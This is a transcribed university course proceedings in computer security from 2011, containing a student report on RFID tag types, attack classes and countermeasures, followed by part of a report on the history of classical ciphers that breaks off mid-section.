CS3235-SemI-2011-12 - School of Computing
Transcription
CS3235-SemI-2011-12 - School of Computing
NATIONAL UNIVERSITY OF SINGAPORE SCHOOL OF COMPUTING CS3235 - Semester I, 2011-2012 Computer Security The Project Proceedings for CS3235 - Computer Security November 2011 Singapore ii Table of Contents The Security of RFID and its Implications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Kang Jun Lee, Jack Aw Yong, Raphael Wun (Gp 1) Cryptography: From a Historical Perspective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 Wei Xiang Lim, Kok Wei Ooi, Tuan Kiet Vo and Mei Xin Shirlynn Sim (Gp 2) Elliptic Curve Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 Guan Xiao Kang, Chong Wei Zhi, Cheong Pui Kun Joan (Gp 3) Security Requirement in Different Environments. . . . . . . . . . . . . . . . . . . . . . . . . . . .53 Ru Ting Liu, Jun Jie Neo, Kar Yaan Kelvin Yip, Junjie Yang (Gp 4) Integer Factorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 Romain Edelmann, Jean Gauthier, Fabien Schmitt (Gp 5) A Study into the Underlying Techniques Deployed in Smart Cards . . . . . . . . 109 Clement Tan, Qi Lin Ho, Soo Ming Poh (Gp 6) Analysis of Zodiac-340 Cipher. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .125 Yuanyi Zhou, Beibei Tian, Qidan Cai (Gp 8) The sampler of network attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 Guang Yi Ho, Sze Ling Madelene Ng, Nur Bte Adam Ahmad and Siti Najihah Binte Jalaludin (Gp 9) Report for the Study of Single-Sign-On (SSO), an introduction and comparison between Kerberos based SSO and OpenID SSO . . . . . . . . . . . . . . . . . . . . . . . . . . . 163 Xiao Zupao (Gp 10) iii Table of Contents An Exploration into the Various Authentication Methods Used to Authenticate Users and Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175 Gee Seng Richard Heng, Horng Chyi Chan, Huei Rong Foong and Wei Jie Alex Chui (Gp 11) Different strategies used for securing IEEE 802.11 systems; the strengths and the weaknessess . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193 Cheng Chang, Yu Gao (Gp 12) Malicious Software: From Neumann’s Theory of Self-Replicating Software to World’s First Cyber Weapon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211 Kaarel Nummer t (Gp 13) Password Authentication for Web Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219 Shi Hua Tan, Wen Jie Ea, Rudyanna Tan (Gp 14) Data Security for E-transactions: Online Banking and Credit Card Payment System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239 Jun Lam Ho, Alvin Teh, Kaldybayev Ayan (Gp 15) A Review of the Techniques Used in Detecting Software Vulnerabilities . . . . 257 Nicholas Kor, Cheng Du (Gp 17) Intrusion and Prevention System Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267 Tran Dung, Tran Cong Hoang (Gp 18) An exploration into what Public Key Infrastructure is, how it’s implemented, and how the greatest vulnerability of the Public Key Infrastructure has nothing to do with their keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283 Laurence Putra Franslay (Gp 19) iv The Security of RFID and its Implications Kang Jun Lee, Jack Aw Yong, Raphael Wun School of Computing, National University of Singapore Abstract. The wide usage of RFID tags has largely increased its market value, and this made the security of RFID tags increasingly important. In this report, we investigate the security and vulnerability of the RFID tags by measuring it theoretically, as well as through real-life examples. Besides, we also look into the countermeasures and protocols against the attacks on RFID tags, bring out some of the existing methods on preventing the attacks, and as well do a brief suggestion of our own on how to improve its security level. Keywords: RFID, Security, vulnerability of RFID, security of RFID, Radio Frequency Identification 1 Introduction Radio Frequency Identification is what we commonly knew as RFID and it has been around for decades. Its history can be traced all the way back to the Second World War. The Germans, Japanese, Americans and British were all using radar during the war to warn of approaching planes while they were still miles away. However, there were unable to differentiate between friendly and hostile planes. The Germans discovered that if pilots rolled their planes as they returned to base, it would change the radio signal reflected back. This method indicated to the radar crew on the ground that those were German planes and not allied aircraft (this is, essentially, the first passive RFID system). The British on the other hand developed the first active identify friend or foe (IFF) system. They installed a transmitter on each of their planes. When it received signals from radar stations on the ground, it began broadcasting a signal back that identified the aircraft as friendly. RFID works on this same basic concept. A signal is sent to a transponder, which activates the integrated chip and either reflects back a signal (passive system) or broadcasts a signal (active system). [1] RFID patents were first made in the U.S by Mario W.Cardullo on January 23 1973. He invented an active RFID tag with rewritable memory. Also in the same year, Charles Walton received a patent for a passive transponder user to unlock a door without a key. [1] Over the years, such technology has evolved and people are discovering more ways they can apply RFID to. It has evolved in such a way that it is replacing the barcode technology that we are familiar with. In the absence of contact or direct line of sight, which barcode technology requires, communication of 1 information still takes place. A simple RFID system can be made up of three components. They are i) an antenna, ii) a RFID reader and iii) a RFID tag. The antenna of the RFID system broadcasts radio signals to activate the RFID tags in order to read and write data to it. The RFID reader broadcasts radio waves and its strength depends on the output power and the radio frequency being used. The read range can be as little as one inch and can span as far as 100 feet or more. When the RFID tag is within the reader‟s broadcast range, the tag is activated and the reader decodes the data that is encoded in the tag‟s silicon chip. The decoded data can then be passed to a host computer for processing. Since the birth of RFID technology, it has become cheaper over the years to implement such a system. As a result we come into contact with it in different areas of our work and life. As this technology becomes more pervasive, just how secure is the data that is being transmitted? In this research report we would be exploring on the different RFID tags that are in the market, some examples of usages of RFID and investigate on how secure are RFID systems that are around us and we hope to be able to give suggestions or improvements to enhance the infrastructure. 2 Introduction to RFID and its Security 2.1 Types of RFID Tags As discussed earlier, RFID tags can be active or passive, below are a list of active and passive tags that are being used currently. 2.1.1 Active RFID Tags Such tags have a radio signal transceiver a battery onboard to power it. The integrated power supply allows the tag to activate itself regardless of whether a RFID reader is in proximity. Active RFID tags have longer read ranges because of this integrated power supply as compared to passive RFID tags that have no battery and integrated transceiver. Active RFID tags are commonly used together with Real Time Location Systems (RTLS) because of its characteristics. The embedded battery also allows extra sensors to be powered, i.e. for humidity, temperature, pressure measurement. 2 2.1.2 Passive RFID Tags Passive RFID tags do not have an embedded transceiver and battery and it therefore has a shorter read range as compared to active RFID tags and Battery-Assisted Passive RFID tags. When a passive tag enters a field generated by a reader, it is being activated and it responds by “reflecting” the reader‟s modulated signal; this technique is called “backscatter”. The reader will then receive and decode the response. Passive RFID tags are low in price and they are commonly used for a wide range of applications in the market but it is rarely used for RTLS because of the way it is being activated. Such tags cannot embed extra sensors as it does not have an integrated power supply. 2.1.3 Battery-Assisted Passive (BAP) RFID tags: BAP RFID tags are basically passive RFID tags in nature and it also uses backscatter to work, but it has an integrated battery that keeps the integrated chip in a stand-by mode. Passive RFID tags read ranges are often short as power is required to channel to the integrated chip to activate it. The distance between the reader and the passive tag would determine whether the minimum energy threshold is achieved to activate the integrated chip. With the battery in BAP RFID tags, it helps to overcome the minimum energy threshold to activate the tag and thereby increasing the read distance. When the battery is depleted, a BAP RFID tag behaves just like a regular passive RFID tag. BAP RFID tags are more expensive than regular passive tags but are cheaper than active tags. 2.1.4 Passive RFID tags with Solar panel and Ultracapacitor: Such chips function very similarly to BAP RFID tags, it uses the combination of the built-in solar panel and ultracapacitor instead of a battery. In lighted conditions, the solar panel provides energy to the RFID tag to enable it to have longer read ranges and at the same time the ultracapacitor is being changed. Under poor light conditions or total darkness, the ultracapacitor therefore able to maintain its read performance for many hours dues to the stored energy is the ultracapacitor. If it remains in dark for too long a time, the energy in the ultracapacitor would be depleted and it would function like a normal passive RFID tag till it is exposed to light again. 3 2.1.5 Semi-passive RFID tags: A semi-passive RFID tag still uses the backscatter technique to communicate with the reader. It has a battery that is used to power on-board microcontrollers and extra sensors, i.e. a temperature logger. When the battery is depleted, the semi-passive RFID tag stops transmitting any signal. 2.2 Applications of RFID Tags Smart Cards Passports The above 2 applications of RFID tags contain valuable information to individuals as well as corporations. RFID smart cards can be used in as security access cards like the NUS Matriculation card, transport cards like our EZ-link cards and even credit cards. RFID passports contains information regarding its holder and the holder will face a theft of identity should a hacker be able to obtain the information. 4 There are of course other usages of RFID tags that do not contain sensitive information. For example, RFID tags are used in libraries, where the books are being tagged such that they can be located easily and it prevents unauthorized checkouts by triggering the alarm. RFID tags are also used in marathon races to record the runner‟s start and end timings, such tags are commonly termed as “champion tags. RFID tags are also used by corporations to track their shipments and aid in their logistics accounting in the warehouse. Workers will no longer need to physically count the number of products or scan barcodes to obtain the necessary information. 2.3 Security on RFID 2.3.1 Security of RFID Passports An RFID passport uses Basic Access Control (BAC) to prevent personal information being extracted without authorization. BAC uses data such as the passport number, date of birth and expiration date to obtain a session key. This key is then being used to encrypt the communication between the passport‟s integrated chip and a reading device. This mechanism is supposed to ensure that the owner of a passport can decide who can read the electronic contents of the passport. [2] It also uses Extended Access Control (EAC) to protect other sensitive data such is information for iris recognition and fingerprint recognition. There are 2 types of EACs to be implemented with the BAC for passports issued in the European Union. They are the EAC Chip Authentication (CA) and the EAC Terminal Authentication (TA). [3] The main aim of the CA segment is to check and ensure that the chip in the in the passport is not cloned and establish a secured communication channel. The TA segment is used to determine whether an Inspection System for the passport is allowed to read the sensitive data stored in the passport and it uses card verifiable certificates issued by a document verifier. The lifespan of each certificate ranges between a day to a month. An Inspection System may hold several of such certificates and each belongs to a country that allows the system to read the stored data. 5 2.3.2 Security of Smart Cards The above table shows the various RFID frequencies together with their capabilities and applications. The EZ link cards as well as a variety of smart cards available in the market, function under the High Frequency Range of 13.56Mhz. Some examples of encryption techniques that are being used on such smarts cards are the Triple DES technique, Secure Hash Algorithm (SHA-1) and Crypto-1. Triple DES uses the Data Encryption Standard (DES) cipher algorithm three times to each of the data blocks. By performing the encryption technique three times, it increases the key size to protect against brute force attacks and therefore increasing its reliability. The SHA-1 hash algorithm has a hash value length of 160 bits. It is boasted to be more secure than the MD5 algorithm and is used in secure protocols like SSH and SSL. Crypto-1 is made up of a 48-bit feedback shift register for the main secret state of the cipher, a linear function, a 2-layer 20 to 1 nonlinear function and a 16-bt LFSR which is used during the authentication phase. However this function is not secure, yet it was being implemented in subway card systems. 6 3 Vulnerability of RFID systems The invention of RFID does bring much convenience into our daily life. The cards that we use for taking transportation or making payments are great illustrations on the usage of RFID. However, RFID and its systems do possess a series of vulnerabilities that are susceptible to a broad range of malicious attack, which include pervasive eavesdropping to active interference. The reason why RFID is prone to such attacks is due to its contactless nature. Hackers could probably have many ways to gain information from the cards that make use of such mechanism. Hence it is hard to find good methods that countermeasure such attacks. 3.1 Classification of RFID Attacks Figure 1. Classification of RFID Attacks Extracted from Classifying RFID Attacks and Defenses by Aikaterini Mitrokotsa, Melanie R. Rieback, Andrew S. Tanenbaum [4] 7 The different types of RFID Attacks can be categorized into 4 different layers Physical Layer, Network-Transport Layer, Application Layer and Strategic Layer. Apart from that, there are attacks that can be targeted at multiple layers. [4] In this research paper, only a handful of attacks will be picked to describe something relevant to our daily life. Prior to diving into the details of attacks associating with the layers, a short description will be attached, talking about how susceptible it is to its vulnerabilities. The mechanism of each attack will be described as well, and a possible scenario is to be attached to how closely it would be to the routine usage of RFID. 3.1.1 Physical Layer The physical layer in RFID communications comprises of a physical interface, radio signals, and RFID devices that send or receive information between the card. What can really possible happen is that in the nature of RFID where wireless communication is concerned, it has poor physical security and lacks of resilience against any physical manipulation. There are attacks that could either permanently or temporarily disable RFID tags, as well as relay attacks. 3.1.1.1 Permanent disabling of RFID RFID tags are extremely sensitive to static electricity. It can be damaged instantly by electrostatic discharge caused by high energy waves. In this manner, the RFID tag will deactivate passive RFID tags permanently. For active RFID tags, the battery can be discharge through extremely high or low temperature. 3.1.1.2 Temporary disabling of RFID There are two types of attacks that can temporarily disable RFID tags: (i) Passive Interference: When RFID network is operated in an unstable and noisy environment, it is prone to possible interference and collisions from any source of radio interference (e.g. electronic generators or power switching supplies). Such interference can prevent accurate and efficient communication between the tag and the reader. (ii) Active jamming: An adversary can take advantage of RFID's characteristic of listening indiscriminately to all radio signals in its range. In this way, one could create signals within the same range that could prevent the tags from communicating efficiently with the readers. 8 3.1.1.3 Relay attacks An adversary will act as a man-in-the-middle. Basically what it means is something an adversarial device is placed between a legitimate RFID tag and a reader. The adversarial device is able to intercept and modify the radio signals as it is receiving communications from both the legitimate tag and legitimate reader. Relay attacks can further categorized in two types: (i) Mafia fraud: It is to involve the existence of an illegitimate party that relays information between two legitimate parties. (ii) Terrorist fraud: Involves with cooperation of dishonest but legitimate tag by relaying information to the illegitimate third party. However, the dishonest but legitimate tag does not share secrets with the relaying illegitimate party. 3.1.2 Network - Transport Layer The attacks on this layer is based on how RFID systems communicate, as well as the way data being transferred between entities (reader, tag) of an RFID network. 3.1.2.1 Cloning This refers to replicating a clone of an RFID tag. If a RFID tag does not have any forms of security features, cloning is as simple as copying the tag's ID and any associated data to the clone tag. However, if the tag has extra security features, then the attacker needs to perform a much sophisticated attack such that the reader is being fooled in accepting the clone tag as a legitimate one. Eventually, cloning tags causes confusion and violation of system integrity. 3.1.2.2 Spoofing A variant of cloning that does not physically replicate the RFID tag. Basically it employs the use of special devices with increased functionality that are able to emulate the RFID rags given some data content. The adversary will in turn take the impersonation of a valid RFID tags to gain privileges to gain communication as per the original tag. 9 3.1.2.3 Reader Attacks (i) Impersonation: Since RFID communication is most of the time unauthenticated, adversaries may easily make counterfeits as identity of real tag readers to elicit sensitive information or modify data. Interestingly, such attacks can be ranged from very easy to "practically impossible". (ii) Eavesdropping: The wireless nature of RFID makes eavesdropping one of the serious and easily deployable threats. An unauthorized individual an use an antenna in order to record communications between legitimate tags and readers The feasibility of this attack depends on factors like say distance of attacker and legitimate RFID devices. 3.1.3 Application Layer The attacks on this layer are mostly related to applications and the binding between users and RFID tags. Such attacks employ unauthorized tag reading, modification of tag data and attacks in application middleware. 3.1.3.1 Tag modification An adversary can make use of writable memory and exploit on attacks that could modify or delete valuable information. This depends on whether the RFID standard use and its protection on read/write is employed. The amount of impact on such attacks depend largely on what tags are being used, as well as the degree of modifications made, especially on tagging objects or humans' critical information. Eventually, if the reader is being fooled that the tag is an unmodified tag, the adversary can write falsified information into the tag. This could intensify an aftermath, especially if one talks about having an RFID tag containing a patient's information and the drugs he is supposedly to take. 3.1.3.2 Middleware Attacks Buffer overflow: Middleware is able to attack on fixed-length buffer. Basically, an adversary can launch an attack by launching buffer overflow attack on backend of RFI middleware. Malicious Code Injection: Through the usage of injection such as an SQL injection, an adversary is able to exploit on this and inject malicious codes that compromise the backend RFID system. The attack based on an unexpected execution of SQL statements that lead to unauthorized access to backend database and subsequently reveal or modify data stored in backend RFID middleware. 10 3.1.4 Strategic Layer Strategic layer is not visited in this report as the impact is not much applicable to our fields of research. 3.1.5 Multilayer attacks 3.1.5.1 Denial of Service Attacks Normal operation of RFID tags may be interrupted intentionally by blocking access to them. Such deliberate blocking of aces and subsequent DoS can be caused by malicious uses of "blocker tags" Another form of DoS attack will be the unauthorized usage of LOCK commands. They include several RFID standard in order to prevent unauthorized writing on RFID tags' memory. 3.1.5.2 Crypto attacks Attackers can employ crypto attack to break employed cryptographic algorithms and reveal or manipulate sensitive information. By performing for example a brute-force attack, one an easily break the encryption key and obtain information. 3.2 Real world implications As we can see from above, there are various way for a hacker to crack a RFID system. For example, in 2008 a group of MIT students published apaper revealing information on how to hack the RFID system belonging to the subway system in Boston that uses Crypto-1. [5] The above mentioned hack is not just restricted to the United States. Oyster card, which is a United Kingdom‟s equivalent to Singapore‟s ez-link card, has been hacked at the same year. A group of German scientists managed to crack the Mifare chip within Oyster card and revealed how possible it is to take a free ride on London transportation. [6] They published a paper on the findings on a security exploit on the Mifare DESfire MF3ICD40 which is commonly used as an RFID smart card. They used an approach that was previously used to hack other wireless crypto systems. The attacker must first have the smart card physically, an RFID reader and a radio probe. It then 11 performs a template “side-channel” attack on the card‟s crypto. Using differential power analysis, data is being collected from radio frequency energy that leaks out of the card (“side-channels). By performing this process, the entire 112-bit secret key of the Mifare DESfire MF3ICD40 which uses Triple DES encryption was being retrieved. [6][7] There are more examples showing that the vulnerability is not just restricted to public transport systems. A hacker in the United Kingdom has come out with a fast and cheap way to crack RFID encryption on an American Express card. By spending US$8, one can readily obtain a reader and software that is available on eBay to obtain information from the card, and proceed with the cracking procedures. [8] Same applies to electronic passports as well. Despite all the security measures that most electronic passports claim to have, the information being stored in the RFID passport is still not safe. Despite the presence of an encrypted session key, it was discovered in recent months that researchers in the Netherlands have found a way to read some stored information remotely. [9] These examples show that even the relatively strong encryption algorithms used in "touchless" smart cards can be cracked with a small investment of time and the right equipment. Exposing the shared crypto key and the data stored on them. This shows that many RFID systems around us are vulnerable, and more security measures have to be implied to the system to ensure that the system is safe to be used. 4 Countermeasures for Attacks on RFID Systems RFID attacks are easy, and hard to prevent due to its cheap and contact-free nature. Even though it is possible to implement better encryption algorithm to prevent loss of data confidentiality, it is very costly to implement such algorithms in a RFID chip, which is not feasible for most RFID systems, since they are restricted to a lower price (such as smart card for transport system), which also means limited resource on the chip to implement such algorithms. [10] Besides, most of the time confidentiality itself does not stop the hackers from exploiting the system. For example, simply cloning the RFID chip would be able to let the hackers achieve their goal, without having to know what is contained inside the chip. It is a big challenge to ensure the security of such system, and many efforts have been put into this issue. Besides the basic encryption and hashing that we use, there are still other methods to prevent RFID attacks. 12 4.1 Authentication Some RFID chips adopt policies to only enable reading by specified devices. Unauthorized devices are not allowed to read from the chip, and this can prevent sniffing of the chip by unauthorized readers. [11] 4.2 Physical Shielding Besides things that can be improved on the system, there are ways to improve security by the efforts of end user. We can make use of a physical method, which makes use of a thing called the Faraday net (from electro-magnetic field theory, container made of conductor can shield radio wave, and is called a Faraday net.). [12] The user can put their RFID within a Faraday net all times, and take them out only when they meet the need. This can prevent the RFID from being read unless the user is required to use them, and this can prevent unwanted leakage of data from the RFID chips. But, it is impossible to force every user to cultivate such habit, which makes this method impractical to make use of. However this can be noted as a personal countermeasure for anyone who wishes to keep their RFID materials safe. 4.3 Back-end monitoring Since practically it is nearly impossible to make sure perfect security for cheap RFID chip based systems, we can seek for another option, which is to „cure‟ instead of „prevent‟. The idea is to constantly monitor the RFID back-end for any suspicious actions (such as „possible cloned RFID access‟), and investigate on the issue when detected. [13] One of the example schemes that we can propose is this: Taking the example of public transport cards (ez-link, oyster cards), the back-end can maintain integrity of the card by storing usage information (time, location, etc.) on the card as well as the back-end server when used. This way, the card will store the some of the recent usage records. Since the card has usage history stored, cloned card will show a difference with the original card if the cards are used more than once (by different user). This will be reflected in the back-end server, since some of the access entries that exists at the server will be missing from each of the cards. Once a mismatch is noticed, this can be detected by the system, and then picked up to alert the system manager. The actions to be taken next can be decided by the system manager. This does not actually make the RFID system safer, but it can make the system less exploitable without being noticed. This enables a quick response to be performed after 13 a misuse is detected, without suffering more losses from the consequences of the misuse. These are the extra countermeasures that can be taken in order to protect RFID systems. They are an add-on to the basic security standards, which enables RFID to achieve a better security level. 5 Conclusion After looking at various RFID systems and their security standards, we have arrived to a conclusion that RFID systems are vulnerable and needs to be improved with newer standards. However there are big obstacles such as the low-cost restriction for some systems, and also the contact-free communication characteristic of the RFID chips. Although many security implementations, including encryption, hashing and authentications are done, most of the RFID system is still vulnerable with various types of attacks, which some of the being unavoidable. At this point, being self-aware of the insecurity when using RFID based identification procedures becomes very important, because system alone is unable to ensure perfect security at the moment. Public awareness on insecurity of RFID should be raised, as this is currently still the best way to prevent RFID attacks. References 1. M. Roberti, “The History of Rfid Technology - Rfid Journal,” rfidjournal.com, http://www.rfidjournal.com/article/view/1338/1 (accessed October 29, 2011). 2. Hopewell, Luke. Rfid, E-Passport Security at Risk: Aus Govt. ZDNet, May 31,2011. http://www.zdnetasia.com/rfid-e-passport-security-at-risk-aus-govt-62300530.htm 3. D. Kugler, “Extended Access Control: Infrastructure and Protocol” (June 1, 2006), http://www.interoptest-berlin.de, PDF file, http://www.interoptest-berlin.de/pdf/Kuegler__Extended_Access_Control.pdf 4. A. Mitrokotsa, M. R. Rieback, A. S. Tanenbaum. “Classifying RFID Attacks and Defenses.” Amsterdam, n.d. 5. R. Ryan, Z. Anderson, A. Chiesa, “Anatomy http://tech.mit.edu/V128/N30/subway/Defcon_Presentation.pdf of a Subway Hack”, 6. “Oyster card „free travel‟ hack to be released”, ITPRO.co.uk, July 22 2008, http://www.itpro.co.uk/604770/oyster-card-free-travel-hack-to-be-released 14 7. S. Gallagher, “Researchers hack crypto on RFID smart cards used for keyless entry and transit pass,” ars technica, Oct 11,2011, http://arstechnica.com/business/news/2011/10/researchers-hack-crypto-on-rfid-smart-cardsused-for-keyless-entry-and-transit-pass.ars 8. Staff, SDN. Researchers hack popular smartcard used for access control. Security Director News, Oct 18,2011. http://www.securitydirectornews.com/?p=article&id=sd201110z7V0yY 9. “RFID credit cards easily hacked with $8 reader”, Engadget.com, March 19 2008, http://www.engadget.com/2008/03/19/rfid-credit-cards-easily-hacked-with-8-reader/ 10. “Passport RFIDs cloned wholesale by $250 eBay auction spree”, theregister.co.uk, February 2 2009, http://www.theregister.co.uk/2009/02/02/low_cost_rfid_cloner/ 11. F. Klaus. “Known attacks on RFID systems, possible countermeasures and upcoming standardisation activities.” 2009. 12. W. Qinghua, X. Xiaozhong, T. Wenhao, H. Liang. “Low-cost RFID: security problems and solutions.” 13. D. N. Duc, H. R. Lee, Divyan M. Konidala, K. Kim. “Open Issues in RFID Security.” Daejeon, 2009. 15 16 Cryptography: From a Historical Perspective Wei Xiang Lim, Kok Wei Ooi, Tuan Kiet Vo, Mei Xin Shirlynn Sim, Computing 1, 13 Computing Drive, Singapore (117417), Republic of Singapore {u0807150, u0906907, 0807235, u0806996}@nus.edu.sg Abstract. In this paper, we studied a variety of cryptography systems that were introduced during various time periods, from the classical ancient era till modern times. With regards to each cipher, its characteristics, history, working explanations or examples to attain message confidentiality, as well as the limitations are addressed. Besides focusing on the aspect of encryption, some cryptography systems in the modern context also do play an important role in authenticating the identity of the sender. Keywords: cryptography techniques, message confidentiality, security, plaintext messages, cipher-texts, brute-force, cipher, monoalphabetic, polyalphabetic, substitution, block, fractionating, digraph, encrypt, decrypt. 1 Introduction The history of cryptography can be divided into four major phases, namely the ancient age, before World War I period, War time and the Modern era. Cryptography refers to the act of concealing written contents within messages away from unintended recipients. In ancient times, cryptography is used largely for private communications, art, religious and military purposes. During then, cryptography was tantamount to encryption as the focus was mainly on converting written messages into cipher-texts. This was done to ensure message confidentiality. Message contents would be protected against unintended, albeit malicious recipients during its delivery from one location to another. During ancient civilization to the early twentieth century, cryptographers developed and performed considerably uncomplicated algorithms on paper. This happened as early as 1900 B.C when Egyptians engraved non-standard hieroglyphs in writing on payrus and wood. In the modern era, as computer communications become prevalent, new cryptography techniques were developed. These cryptography techniques are supported by more complex mathematical functions and stronger scientific approaches. As a result, the probability of cracking the encryption key using current computational technology and algorithms within a reasonable time frame would become relatively more difficult. With regards to communications and electronic transactions over networks like the Internet, cryptography is deemed to be of necessity so as to prevent malicious attacks. Besides ensuring message 17 confidentiality, modern cryptography goals also include ensuring message integrity, authentication, and non-repudiation. In order to attain these goals, three cryptography schemes, namely symmetric cryptography, asymmetric cryptography and hash functions are used. 1.1 Purpose of Website The aim of our “CryptograFreaks” website is to provide a learning platform for people who are interested in the workings behind cryptographic systems. Visitors to our website will be able to attempt to encode and decode their own messages with the use of various cryptographic applets featured. In addition, we also endeavour to reach out and enhance the learning experiences of visitors who have no prior knowledge about the topic of cryptography. You can access our website at the following address: http://www.freedom316.com/cryptografreaks 2 Ancient Cryptography In this segment, we will be exploring two ancient cryptography techniques and its features, specifically the Atbash cipher and Caesar cipher. 2.1 Atbash Cipher (http://www.freedom316.com/cryptografreaks/atbash.php) The Atbash cipher is a monoalphabetic substitution cipher for the Hebrew alphabet. In 500 B.C, the Scribes in Israel wrote the book of Jeremiah using the Atbash cipher. The Hebrew language consists of a few ciphers and the Atbash cipher is one of them. From 500 B.C till 1300 A.D, the Atbash Cipher was used by the Jewish, Gnostics, Cathars and Knights Templars to conceal important names from third parties so as to avoid persecution. During then, Knights Templars were not allowed to worship any other idols apart from God. However, due to the influence of St Bernard Clairvaux, they came up with an encryption to represent their admiration for the Greek Goddess of Wisdom, Goddess Sophia. Upon encryption, her name was represented with the word, “Baphomet”. Unfortunately, it was made known shortly that the Knight Templars have committed idolatry and many of them were captured and sentenced to death. With the help of the Atbash cipher, other Knight Templars managed to escape death sentence as the encrypted names belonging to them could not be identified. It was only in the 20th century when a biblical scholar, Dr Hugh J. Schonfield applied the use of the cipher to decipher words which he thought were senseless. As a result, he uncovered the mysteries of Judaism’s history and the Knights Templars. The cipher reverses the alphabet by substituting the first letter of the alphabet with the last, the second letter with the one before the last and etc. An example in the Latin (Roman) alphabet would be of the following whereby “A” is substituted with “Z”, 18 “B” is substituted with “Y” and so on. Table 1(Refer to Appendix A) illustrates the Atbash cipher in accordance to the Roman letters from A to J. Since the Atbash Cipher is easily reversible, the original letter can be easily decrypted and made known. Thus, the Atbash Cipher lacks complexity and hence, provides minimal security which prevents encrypted messages from maintaining its confidentiality. 2.2 Caesar cipher (http://www.freedom316.com/cryptografreaks/caesar.php) The Caesar cipher is a monoalphabetic substitution cipher. Due to the fact that there are only 25 possible combinations for the substitution of each encrypted letter, it is often perceived by many to be one of the simplest albeit, most renowned encryption technique. In 50 B.C, Julius Caesar was the first to utilize the Caesar cipher to ensure message confidentiality in military and government communications among generals and officials. As seen in Table 2 (Refer to Appendix A)., each letter in the plaintext is substituted with a letter whose fixed position is approximately a few spots away. For example, with a shift of 3, the letter “A” would be substituted by D, B would be substituted by E and etc. Similarly like the Atbash cipher, the Caesar cipher is easily reversible and the original letter can be decrypted easily by reversing the cipher. Since the Caesar cipher lacks complexity, it offers negligible communication security and message confidentiality. However, in ancient era, the Caesar cipher was deemed to be relatively secure because many of Julius Caesar’s unintended recipients were illiterate and even if they were literate, they would have thought that the cipher-texts were written in an unidentified language. Nevertheless, Julian Caesar did attempt to strengthen his encryption technique by replacing Greek Letters for Latin Letters so as to enhance communication security and message confidentiality. 3 Before World War I Cryptography In this segment, we will be exploring two cryptography techniques and its features, specifically the Vigenère cipher and the Jefferson’s Wheel cipher. 3.1 Vigenère cipher (http://www.freedom316.com/cryptografreaks/vigenere.php) The Vigenère cipher is a polyalphabetic substitution. In order to encrypt plaintext messages, different Caesar ciphers are used on the plaintext in accordance to letters belonging to the specified key. The key denotes which cipher substitution will be used for the encryption of each letter. 19 In 1586, French cryptographer and diplomat, Blaise de Vegenere, published his invention of the text autokey cipher, which was later known to be the Vigenère cipher in his book entitled, “Traicté des chiffres ou secrètes manières d'escrires”. In the 19th century, the Vigenère cipher was used to encode messages which are deemed to be confidential across telegram systems. The Vigenère cipher is perceived to be more secure than other monoalphabetic ciphers because it uses 26 different letters to encode a message. In order to decipher the plaintext message, the recipient needs to be aware of the Vigenère tableau and the key used by the sender. The Vigenère tableau in Figure 1 (Refer to Appendix A) consists of a rectangular matrix of 26 letters repeatedly written in every of the 26 rows, each letter being shifted to the left of the previous row by 1 position according to the Caesar cipher. If the sender of the plaintext message would like to encrypt the plaintext message, “HELLO”, he would need to decide on a key. If he decides that the key is, “HEY”, he would have to repeat the letters in the key until the length of the key matches with the length of the plaintext message as shown in Table 3 (Refer to Appendix A). With the given plaintext and key, the sender can locate each cipher letter within the Vigenère Table by searching within the row of the key and column of the plaintext. For example, the first letter of the key is “H”, thus the sender would need to locate the row belonging to “H” and the column belonging to the plaintext “H”. The resultant ciphertext is “O”. Similarly, the Vigenère Cipher can be depicted using cipher discs and the keyword specified by the sender can be used to verify the number of rotating positional shifts which the inner discs have to perform. Even though the Vigenère Cipher is perceived to be more secure and trusted, the cipher-texts can still be decoded. For many years in the 19th century, the Vigenère cipher was deemed to be “le chiffre indechiffrable” – “the unbreakable cipher”. This is mainly because it was able to conceal plaintext letter frequencies which were used in a direct manner. For instance, in the English language, E is often deemed to be the most frequently used letter. If a certain letter within the cipher-text is most used within a cipher-text, one would easily link E to the most-used cipher-text letter. However, with the Vigenère cipher, the most-used letter within the cipher-text have been encoded using different letters, thus this increases the difficulty of decoding the plaintext message via frequency analysis. However, in later years, the Vigenère cipher could be deciphered using brute force and mathematical methods. This is due to the fact that the Vigenère cipher repeats the letters of the key until the length of the key is equivalent to the length of the plaintext. With that, via the Kaisiski test which was invented in 1861 by a German army officer and cryptanalyst, Fredrich W. Kaisiski, identical parings of plaintext messages together with its key symbols may generate same cipher symbols and such repetitive generations can help to decode the plaintext message and at the same time, also break the Vigenère cipher. If the cryptanalyst can identify the correct key length via either the Kasiski or Friedman test, the cipher-text can be easily deciphered. 20 3.2 Jefferson’s Wheel Cipher (http://www.freedom316.com/cryptografreaks/jefferson.php) The Jefferson’s Wheel Cipher is a polyalphabetic cipher system consisting of a set of wheels and an axle. Before becoming the 3rd president of the United States, Thomas Jefferson, an ambassador of US in France, invented the Jefferson Wheel Cipher in 1795 to ensure messages sent to the US were secure and confidential. This cipher was not made known to the US Army until in 1922 when Major Joseph Oswald Mauborgne of the US Army signal corps enhanced on the idea and came up with the M-94 cryptographic equipment. Since then, the M94 became the main cipher used in battlefields till 1942. With regards to the Jefferson’s Wheel Cipher, 36 wheels are used and 26 letters of the Latin alphabet are wrapped around each wheel in a random order. Each wheel is numbered uniquely and the order around the axle will be a significant aspect of this cipher system. A code word will be created by the user and it will be in accordance to the ordering of the wheels. 